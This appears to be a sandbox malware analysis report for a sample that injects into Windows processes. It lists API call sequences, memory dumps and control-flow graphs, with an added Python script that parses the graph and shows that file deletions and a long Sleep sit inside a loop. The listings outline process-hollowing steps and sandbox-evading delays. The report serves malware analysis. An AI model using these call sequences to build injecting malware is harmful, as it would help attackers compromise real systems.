• Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
• Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
Uniqueness

Uniqueness Score: -1.00%
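
The entries above give each function's API calls and its control-flow graph as flat text, so the question a reviewer of this report actually wants answered, whether the DeleteFileA calls and the Sleep sit inside the loop, takes effort to read off by eye. The Python below is an added example, not code from the report or from Joe Sandbox: it parses both pieces for the function at 0x1C29A6 (input copied from this report's entry for process 13, dump 0x1C0000), finds the basic blocks that lie on a cycle, and maps each call's ref: address onto its block. Two assumptions are built in and marked in the code: the graph token grammar is inferred from the serialized strings on this page, and the first cell in an API's argument list is treated as the first stack argument (dwMilliseconds for Sleep).

```python
"""Parse one Joe Sandbox function entry (the 'APIs' list and the serialized control_flow_graph)
and cross-reference them.  Added example, not code from the report or from Joe Sandbox."""
import re

# Copied from this report: 'APIs' bullets of the function at 0x1C29A6 (process 13, dump 0x1C0000).
API_LINES = """\
• lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
"""

# Copied from this report: the serialized graph shown under 'Control-flow Graph' for the same function.
CFG_TEXT = (
    "control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat "
    "call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 "
    "737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f "
    "744 1c2a9a-1c2ab1 call 1c2683 738->743 738->744 743->744 746 1c2a71-1c2a86 call 1c26f9 743->746 "
    "749 1c2ade-1c2af5 call 1c2683 750 1c2ab3 744->749 744->750 746->744 754 1c2a88 746->754 "
    "759 1c2af8-1c2b11 call 1c2e97 760 1c2af7 749->759 749->760 750->749 752 1c2ab5-1c2aca call 1c26f9 "
    "750->752 752->749 761 1c2acc 752->761 754->744 755 1c2a8a-1c2a94 DeleteFileA 754->755 755->744 "
    "765 1c2b34-1c2b48 Sleep 759->765 766 1c2b13-1c2b1c call 1c3057 759->766 760->759 761->749 "
    "764 1c2ace-1c2ad8 DeleteFileA 761->764 764->749 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765"
)

API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_lines(text):
    """One dict per bullet: api, module, args ('?' becomes None), ref (return address), subcall owner."""
    calls = []
    for m in filter(None, map(API_RE.search, text.splitlines())):
        calls.append({"api": m["api"], "module": m["mod"],
                      "args": [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",") if a.strip()],
                      "ref": int(m["ref"], 16),
                      "subcall": int(m["sub"], 16) if m["sub"] else None})
    return calls


def parse_cfg(text):
    """Token grammar inferred from the report: '<id> <addr>[-<addr>]' opens a basic block, 'call <addr>'
    and bare API names are its operations, '<src>-><dst>' is an edge.  Returns ({id: (range, ops)}, edges)."""
    toks = text.split()
    nodes, edges, cur, i = {}, [], None, 1   # toks[0] is the literal 'control_flow_graph'
    while i < len(toks):
        t = toks[i]
        if "->" in t:
            src, dst = t.split("->")
            edges.append((int(src), int(dst)))
        elif t == "call":
            nodes[cur][1].append(("call", int(toks[i + 1], 16)))
            i += 1
        elif t.isdigit():
            cur = int(t)
            nodes[cur] = (toks[i + 1], [])
            i += 1
        else:
            nodes[cur][1].append(("api", t))
        i += 1
    return nodes, edges


def nodes_on_cycles(nodes, edges):
    """Block ids that can reach themselves, i.e. the bodies of loops."""
    reach = {n: {d for s, d in edges if s == n} for n in nodes}
    while True:  # grow to the transitive closure, then test self-reachability
        grown = {n: reach[n] | set().union(*(reach[m] for m in reach[n])) for n in nodes}
        if grown == reach:
            return {n for n in nodes if n in reach[n]}
        reach = grown


def apis_in_loops(nodes, edges):
    """(block id, address range, API name) for every API call that sits inside a loop."""
    loop = nodes_on_cycles(nodes, edges)
    return [(nid, nodes[nid][0], name) for nid in sorted(loop)
            for kind, name in nodes[nid][1] if kind == "api"]


def node_for_ref(nodes, ref):
    """Map a 'ref:' return address from the API list onto its basic block (ranges are inclusive)."""
    for nid, (rng, _ops) in nodes.items():
        lo, _, hi = rng.partition("-")
        if int(lo, 16) <= ref <= int(hi or lo, 16):
            return nid


def sleep_delay_ms(calls):
    """First listed argument of the function's own Sleep, read as dwMilliseconds
    (assumption: the report's first argument cell is the first stack argument)."""
    own = [c for c in calls if c["api"] == "Sleep" and c["subcall"] is None]
    return own[0]["args"][0] if own else None


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_TEXT)
    for nid, rng, name in apis_in_loops(nodes, edges):
        print(f"inside loop: block {nid} ({rng}) -> {name}")
    print(f"Sleep between iterations: {sleep_delay_ms(parse_api_lines(API_LINES))} ms")
```

Run as a script, the block reports that all three DeleteFileA calls and the Sleep lie in the loop body (blocks 755, 764, 765 and 769), while the three lstrcat calls in the entry block 716 do not. The 000A012C the report lists is 655660 ms if read as dwMilliseconds, so a sandbox run shorter than that observes at most one iteration of the delete loop; whether the listing's first cell really is the first argument should be confirmed against the disassembly before relying on the number.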

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0230320E
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 0230324C
                                                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,023031D9,00000011,?,00000000,00000000), ref: 02303279
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,023031D9,00000011,?,00000000,00000000,00000000,02303092,00000004,00000000), ref: 02303285
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,023031D9,00000011,?,00000000,00000000,00000000,02303092,00000004,00000000), ref: 02303291
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3387338972-0
                                                                                                                                                                • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction ID: 35bf88575bd4cdcc39526f0d954a5307ec285f7f27c932c355d61de44610a1bc
                                                                                                                                                                • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction Fuzzy Hash: BA1112724005189FDF126B60CC98A9FB7BDEF40705F0145A5A985E6045DA305A80CFA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3387338972-0
                                                                                                                                                                • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 273847653-0
                                                                                                                                                                • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,02303F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02303F51
                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,?,02303F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02303F6F
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 02303F7F
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 02303F8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction ID: 901d359099c71e630482be16dab5d5e572698b98821eb063051bc619bddaf5a8
                                                                                                                                                                • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction Fuzzy Hash: 8CF01C705543509AFB603BB08CECA4A3AB9AF00705F0400D2AA89BE4D6CF7491508E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                • String ID: j
                                                                                                                                                                • API String ID: 4133054770-2747090070
                                                                                                                                                                • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.2887276174.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_ab0000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: a746e57cf6378d43ca32d6e26f47fe512de4d0868098c976c8f9b264cff3b5ab
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 0B31C8724102046FEB017FB09E46EFB3BACEF11310F440165BD85DA0A7EA744A658AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.2884416308.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_290000_smartscreen.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: 5cfeb1bcbae8c558e98dcdee69f702b75d149b9acfc2b5526b48693fa100539d
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: F421F730B34C1E0BEF58A67D9859764F6D2E79C320F980295E90DD36E8ED58CC9187C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.2884416308.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_290000_smartscreen.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: c058b29fad30e67ee3f8ad258c7953d0322cd43e49dbed41448cb6062d2459d6
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 9A31E872520209BFEF017F709D86ABA77ACFF11300F400165BD85DA0A6DA744D74CAB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.2879902182.0000000000580000.00000040.00000001.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_580000_TextInputHost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: ad2bcb2392a4eecc8ec5ac587f61150cc7b45fc580965541663a43ffb8525291
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 8131C3720006056FEF417B709D4AABA7FACFF51310F001165BD85EA0E2EA7449A98BB6
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 022A098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022A09A5
  • Part of subcall function 022A098B: GetStartupInfoA.KERNEL32(00000000), ref: 022A09BD
• ExitProcess.KERNEL32(00000000), ref: 022A001D
Memory Dump Source
• Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
Similarity
• API ID: ExitInfoMutexOpenProcessStartup
• String ID:
• API String ID: 213680645-0
• Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction ID: a68358f380a96d612f0cb8167b0cfc63c9d4dd549bf7c762d647430277cdcda5
• Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
• Instruction Fuzzy Hash: 9C72006142E3C14FD7279BE44A74BA57F78BF03308B0910CBC5819E8BBD6649B09C76A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000014.00000002.1929115712.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_21f0000_bin.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: $1;$@$C[$R$d:$wJ$y7$v
• API String ID: 544645111-3459585926
• Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction ID: 28e5be904831581971660279813b2c29e89ec9c6c7ba3c7a11617b115dd6d7d6
• Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction Fuzzy Hash: 9F3277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00001388), ref: 001C0959
• RtlExitUserThread.NTDLL(00000000), ref: 001C0961
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
• GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
  • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
  • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
  • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
  • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
  • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
  • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
  • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
  • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
Memory Dump Source
• Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
Similarity
• API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
• String ID:
• API String ID: 1099281029-0
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
• Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
• Sleep.KERNEL32(000007D0), ref: 001C3F5B
• Sleep.KERNEL32(00000BB8), ref: 001C3F6B
Memory Dump Source
• Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
Similarity
• API ID: Sleep$HandleModule
• String ID:
• API String ID: 3646095425-0
• Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
• Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
• Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 53 1c1345-1c1352 54 1c1358-1c135e 53->54 55 1c13eb-1c13ec 53->55 54->55 56 1c1364-1c137a VirtualProtect 54->56 56->55 57 1c137c-1c138f VirtualAlloc 56->57 57->57 58 1c1391-1c1398 57->58 59 1c139b-1c13ab call 1c0e7c 58->59 62 1c13ad-1c13e5 VirtualProtect 59->62 62->55
APIs
• VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
• VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
• VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
Memory Dump Source
• Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 511 22a3409-22a3462 GetVolumeInformationA call 22a3634
APIs
• GetVolumeInformationA.KERNELBASE(022A3405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 022A3409
Memory Dump Source
• Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
Similarity
• API ID: InformationVolume
• String ID:
• API String ID: 2039140958-0
• Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
• Instruction ID: 175a78ab8dedf140103e6ebc39a8db2d7994838a56987a0e1431682536ce1ac2
• Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
• Instruction Fuzzy Hash: 75F0FE75500154DBEF02EF24C485A9A77F8AF44344F4504C8AA4DBF206CA309555CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(022A2949,00000008,?,00000000,022A2835,00000000), ref: 022A2956
• VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 022A2993
• lstrcat.KERNEL32(00000000,022A29C1), ref: 022A29D0
• lstrcat.KERNEL32(00000000,022A29F8), ref: 022A2A07
• lstrcat.KERNEL32(00000000,022A2A2F), ref: 022A2A3E
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 022A2B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 022A2B66
Memory Dump Source
• Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
• String ID:
• API String ID: 675344582-0
• Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
• Instruction ID: 8cf38ce699ad67073cb319f5fb9e307f4ad5268875acf3c64b95e5b257230b88
• Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
• Instruction Fuzzy Hash: 43518471414314DFDB22AFB08D58FEB77BDFF40704F4405A5AE45EA459EA349680CEA1
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
Control-flow graph (rendered from an edge list in the original; summarized here): the entry block 1c292d-1c2943 calls 1c3653 and LoadLibraryA; 1c2961-1c2977 calls VirtualAlloc and has an edge back to itself (retry loop) before falling through to 1c2979-1c299f; 1c29a1-1c2a1a builds a string with three lstrcat calls (through subcalls 1c29dd, 1c2501 and 1c2a14); 1c2a20-1c2a43 (calls 1c2b4d, 1c34f7) and 1c2a48-1c2a4f form an inner loop; the outer loop body 1c2a51-1c2b48 contains three DeleteFileA calls (1c2a8a-1c2a94, 1c2ace-1c2ad8, 1c2b1e-1c2b2e), each reached only after a call to 1c2683 and a check in 1c26f9 or 1c3057 take the branch; the body ends with Sleep at 1c2b34-1c2b48, which branches back to 1c2a48.
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
